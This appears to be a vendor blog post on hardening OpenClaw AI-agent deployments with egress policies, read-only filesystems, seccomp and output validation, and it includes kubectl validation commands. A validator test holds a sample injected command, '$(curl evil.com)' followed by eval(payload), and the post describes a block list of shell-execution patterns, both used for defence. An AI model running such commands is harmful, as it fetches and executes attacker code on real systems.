The Agent Governance Paradox: 57% Run Agents in Production. Only 20% Have Governance.
Why traditional governance frameworks collapse under agent autonomy.
SECURITY
Liam McCarthy
Dispatched: Mar 2026
10 min read

135,000+ exposed OpenClaw instances. 36% of ClawHub skills flagged with security flaws. Three critical CVEs that let attackers steal tokens, escalate privileges, and escape sandboxes.
Those numbers come from SecurityScorecard's STRIKE team (February 2026 Shodan scan), Snyk's ToxicSkills audit of 3,984 ClawHub skills, and OpenClaw's own security advisories. If you're running AI agents in production, these are your problems right now.
This post is a threat assessment disguised as a tutorial. We cover what's actually happening in the OpenClaw vulnerability landscape, why traditional container security doesn't address agentic workloads, and how to implement a 4-tier defense strategy using NemoClaw and standard Linux isolation primitives. Each tier includes deployable configuration, validation commands, and honest residual-risk estimates.
A note on NemoClaw: NVIDIA announced NemoClaw at GTC 2026 (March 16) as an open-source enterprise security layer for OpenClaw. It installs the NVIDIA OpenShell runtime in a single command, adding a kernel-level sandbox, an out-of-process policy engine, and a privacy router on top of OpenClaw. NemoClaw is currently in early-access preview – NVIDIA's own docs warn to "expect rough edges" and explicitly state it should not be used in production environments yet. The 4-tier architecture described here draws on NemoClaw's design principles but uses production-ready Linux primitives (network policies, seccomp, read-only filesystems) that you can deploy today regardless of NemoClaw's maturity.
Over the past 90 days, security researchers documented multiple critical CVEs affecting OpenClaw. The three with the highest impact:
Scale of exposure: SecurityScorecard's STRIKE team found 135,000+ publicly exposed OpenClaw instances in their February 2026 scan, with 15,000 of those vulnerable to remote code execution through CVE-2026-25253 alone. By March, that number had grown past 220,000 exposed instances according to the STRIKE team's live Declawed dashboard, which updates every 15 minutes. (SecurityScorecard blog)
Supply chain risk: Snyk's ToxicSkills study (February 2026) scanned 3,984 skills from ClawHub and skills.sh. Of those, 36.82% had at least one security flaw. The researchers identified 1,467 skills with security flaws, including 76 confirmed malicious payloads designed for credential theft, backdoor installation, and data exfiltration. Among confirmed malicious skills, 100% combined code-layer payloads with prompt injection – a dual-layer attack strategy that bypasses traditional static analysis. (Snyk ToxicSkills blog)
The threat landscape above reveals a pattern: attacks against agentic systems operate across multiple layers simultaneously. CVE-2026-25253 exploits the network layer. CVE-2026-32048 exploits the process layer. The ToxicSkills dual-layer payloads combine code injection with prompt manipulation. No single defense covers all of these vectors, which is why the architecture below is organized into four independent tiers – each targeting a different point in the attack chain.
But before diving into the tiers, it's worth understanding why standard container security falls short even when correctly configured.
The gap between standard container hardening and agentic workload security comes down to trust assumptions. Traditional security (network isolation, capability dropping, seccomp) assumes the workload inside the container is trustworthy once deployed. AI agents break that assumption in three ways:
This is why a multi-tier approach matters. Each tier addresses a different point in the attack chain, and no single tier covers all three threat vectors.
Each tier is independently deployable. Start with Tier 1 (highest impact-to-effort ratio) and add tiers incrementally.
What it does: Agents run in network namespaces with explicit egress allowlists. No surprise outbound connections. This directly mitigates token exfiltration (CVE-2026-25253) and reduces lateral movement paths.
Setup:
Deploy two Kubernetes NetworkPolicy resources: first, a default-deny egress policy (podSelector: {}, egress: []) that blocks all outbound traffic from agent pods. Then, an allowlist policy that permits egress only to your API gateway on port 8443 and DNS (UDP 53) to kube-system. This ensures agents can only reach explicitly approved destinations.
Validation:
# From inside the agent pod, verify egress is blocked kubectl exec -it <agent-pod> -- curl -s --max-time 5 \ https://example.com && echo "FAIL" || echo "PASS" # Verify allowed destination works kubectl exec -it <agent-pod> -- curl -s --max-time 5 \ https://api-gateway:8443/health && echo "PASS" || echo "FAIL" # Verify DNS works kubectl exec -it <agent-pod> -- nslookup api-gateway
Why this matters: CVE-2026-25253 relies on the agent UI connecting to an attacker-controlled WebSocket server. If your network policy blocks all egress except your API gateway, the exfiltration channel doesn't exist. Lateral movement (CVE-2026-32042) requires C2 egress – also blocked.
What this tier does NOT cover: Network isolation doesn't prevent privilege escalation within the cluster (CVE-2026-32042 if the attacker is already on the shared gateway), sandbox escape (CVE-2026-32048), prompt injection, or supply chain attacks. Those require Tiers 2-4.
Cost: ~2% CPU overhead for network namespace maintenance. No infrastructure changes beyond Kubernetes network policy support (Calico, Cilium, etc.).
What it does: Agents run with read-only root filesystem plus ephemeral writable directories. Supply chain attacks that depend on modifying agent code, configuration, or runtime libraries post-deployment are blocked.
Setup:
Run containers with --read-only flag and mount /tmp and /var/tmp as tmpfs with noexec,nosuid,nodev flags. In Kubernetes, set readOnlyRootFilesystem: true, allowPrivilegeEscalation: false, runAsNonRoot: true (uid 1000), and use emptyDir volumes backed by Memory with size limits (1Gi for /tmp, 500Mi for /var/tmp). This ensures persistent state is immutable while ephemeral writes still work.
Validation:
# Verify root filesystem is read-only kubectl exec -it <agent-pod> -- touch /opt/agent/config.yaml \ 2>&1 | grep -q "Read-only" && echo "PASS" || echo "FAIL" # Verify /tmp is writable but noexec kubectl exec -it <agent-pod> -- sh -c \ 'cp /bin/ls /tmp/ls && /tmp/ls 2>&1 | grep -q \ "Permission denied" && echo "PASS: noexec" || echo "FAIL"' # Verify agent runs as non-root kubectl exec -it <agent-pod> -- id | grep -q "uid=1000" \ && echo "PASS" || echo "FAIL"
Why this matters: A malicious skill downloaded from ClawHub can't modify the Python/Node.js runtime, agent code, or configuration files. Compromised agents can write to /tmp (ephemeral, per-request), but persistent state is immutable.
Residual risk: Supply chain attacks at build time (compromised base images, poisoned dependencies baked into the image) are NOT caught by filesystem isolation. Pair with container image scanning (Trivy, Snyk Container) at your CI/CD layer.
What it does: Restricts the Linux syscalls available to the agent process. This is the primary mitigation for sandbox escape (CVE-2026-32048) – even if an agent spawns a child process, the child inherits the restricted syscall set.
Implementation:
The following seccomp profile is a minimal allowlist appropriate for a Node.js or Python agent container. Syscalls are grouped by functional category. Every syscall name below is a real Linux kernel syscall.
The seccomp profile uses SCMP_ACT_ERRNO as the default action (deny-by-default) and allowlists syscalls in seven functional groups: File I/O (open, read, write, stat, directory ops), Networking (socket, accept, connect, send/recv), Memory management (mmap, mprotect, brk), Process lifecycle (clone, execve, exit, wait), Event polling (epoll, poll, nanosleep, timers), Signals and threading (futex, kill, sigaction), and Process identity (getpid, getuid, uname, ioctl). The full JSON profile contains approximately 120 individual syscall names across these categories.
Why execve is in the allowlist: Node.js and Python runtimes require execve to start child processes (e.g., node spawning worker threads, pip during initialization, shell-out to git). Removing it breaks most agent runtimes at startup. The compensating controls that prevent execve abuse are: (1) the no_new_privs bit, set via allowPrivilegeEscalation: false in the pod security context, which ensures any execve'd process cannot gain privileges beyond its parent; (2) all capabilities are dropped (drop: ALL), so even if a process is executed, it has no elevated kernel capabilities; and (3) the read-only root filesystem (Tier 2) means there are no attacker-writable binaries to execute in the first place – /tmp is mounted noexec. If your agent runtime does not require execve (e.g., a single-binary Go agent), remove it from the allowlist for a tighter profile.
Save this as agent-seccomp.json and deploy:
# Copy seccomp profile to node
sudo cp agent-seccomp.json \
/var/lib/kubelet/seccomp/agent-seccomp.json
# Apply pod with seccomp + dropped capabilities
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Pod
metadata:
name: agent
spec:
securityContext:
seccompProfile:
type: Localhost
localhostProfile: agent-seccomp.json
containers:
- name: agent
image: agent:latest
securityContext:
allowPrivilegeEscalation: false
capabilities:
drop: ["ALL"]
EOFValidation:
# Verify seccomp profile is loaded
kubectl get pod agent -o \
jsonpath='{.spec.securityContext.seccompProfile}' | jq .
# Verify ptrace is blocked (used in escape techniques)
kubectl exec -it <agent-pod> -- python3 -c \
"import ctypes; ctypes.CDLL(None).ptrace(0,0,0,0)" 2>&1 \
| grep -q "Operation not permitted" && echo "PASS" || echo "FAIL"
# Verify agent still serves requests
kubectl exec -it <agent-pod> -- curl -s \
http://localhost:8080/health && echo "PASS" || echo "FAIL"
# Check all capabilities are dropped
kubectl exec -it <agent-pod> -- cat /proc/1/status | grep CapEff
# Should show 0000000000000000Why this matters: CVE-2026-32048 exploits sandbox inheritance failure in sessions_spawn. With this seccomp profile, even if an agent spawns a child process, the child inherits the restricted syscall allowlist. The syscalls needed for most escape techniques (ptrace, process_vm_writev, mount, unshare) are not in the allowlist and will return EPERM.
Residual risks this tier doesn't fully address:
These percentages are engineering estimates, not measured probabilities. They reflect the proportion of attack surface that remains after Tier 3 is deployed, based on the threat categories observed in the OpenClaw CVE corpus and Snyk's supply chain research.
What it does: Validates and sanitizes model outputs before they're used as executable instructions. Cryptographically signs skill instructions to detect tampering. This is the application-layer defense against prompt injection and memory poisoning.
Implementation:
The InferenceValidator class provides two layers of defense: Ed25519 signature verification for skill responses (a hard cryptographic boundary that detects any tampering) and regex-based output sanitization that blocks dangerous patterns like command substitution ($(...)), backtick execution, pipe chains, eval/exec calls, and OS/subprocess imports. The sanitizer is domain-aware—shell-domain skills bypass pattern checks since they legitimately use those constructs, while all other skill domains get filtered. Important caveat: the regex sanitizer is defense-in-depth, not a security boundary. Production deployments should layer it with AST-based analysis, sandboxed execution (Tier 3), and dedicated LLM output classifiers.
Validation:
# Verify dangerous patterns are blocked
python3 -c "
from inference_validator import InferenceValidator
v = InferenceValidator(test_public_key)
test = 'Run: \$(curl evil.com) and eval(payload)'
result = v.sanitize_output(test, 'search')
assert '\$(curl' not in result, 'FAIL: cmd sub not blocked'
assert 'eval(' not in result, 'FAIL: eval not blocked'
print('PASS: dangerous patterns blocked')
"
# Verify signature rejection
python3 -c "
from inference_validator import InferenceValidator
v = InferenceValidator(test_public_key)
assert not v.validate_skill_response('test', 'tampered', b'bad')
print('PASS: invalid signatures rejected')
"Why this matters: Prompt injection and memory poisoning operate at the application layer – Tiers 1-3 can't see them. Output validation means even if a model is tricked into generating malicious instructions (via poisoned context, adversarial prompts, or compromised MCP data), those instructions are caught before execution.
Residual risk: Memory poisoning (~15% estimated residual) occurs when an agent's persistent context or fine-tuning data is corrupted. Tier 4 catches malicious outputs but can't detect subtle behavioral drift from poisoned training data. Defending against this requires monitoring and anomaly detection at the model evaluation layer, which is beyond runtime isolation.
Monitoring: Log all signature failures and pattern-match blocks to your SIEM. Set alerts for:
Each tier is independent. Deploy incrementally, validate at each step.
Want help mapping this to your stack? If you're running OpenClaw agents in production and want a prioritized deployment plan for your specific infrastructure, book a 30-minute assessment with Reality AI. We'll walk through your topology, identify the highest-risk gaps, and give you a concrete week-by-week rollout. No pitch deck – just architecture.
IBM's Cost of a Data Breach Report 2024 (published July 2024) found the global average cost of a data breach reached $4.88 million – a 10% year-over-year increase. The subsequent 2025 report (published July 2025) showed a decline to $4.44 million, driven by faster breach containment through AI-assisted detection. (IBM 2024 report; IBM 2025 report)
For organizations running AI agent fleets with the vulnerabilities described above, the exposure is real: 15,000 of the 135,000 exposed OpenClaw instances were directly exploitable for RCE.
Here's a simplified risk-reduction model using IBM's $4.88M figure (the higher, pre-AI-defense baseline) as the starting point:
These are directional estimates, not actuarial calculations. Your actual risk profile depends on your deployment topology, data sensitivity, and threat model. The point: the engineering cost of 4 weeks is small relative to even a fractional probability of a $4.88M breach event.
Need help implementing this for your stack? Reality AI offers hands-on deployment support for enterprise AI security architectures, from agent fleet hardening to compliance documentation. Get in touch to discuss your specific environment, or book a 30-minute assessment to prioritize your deployment roadmap.
This architecture is based on NemoClaw's design principles (announced at NVIDIA GTC 2026, currently in early-access preview) combined with production-tested Linux isolation primitives. Residual risk percentages are engineering estimates based on observed attack patterns in the OpenClaw CVE corpus and Snyk's ToxicSkills research -- they are not statistical guarantees. Every CVE description, CVSS score, and external statistic in this post links to its primary source.
Autonomous AI strategy, agent architecture patterns, and enterprise deployment insights — curated by our fleet operations team.
Autonomous AI consulting for enterprises ready to lead.
© 2026 Reality AI. All rights reserved.
$ fleet status --live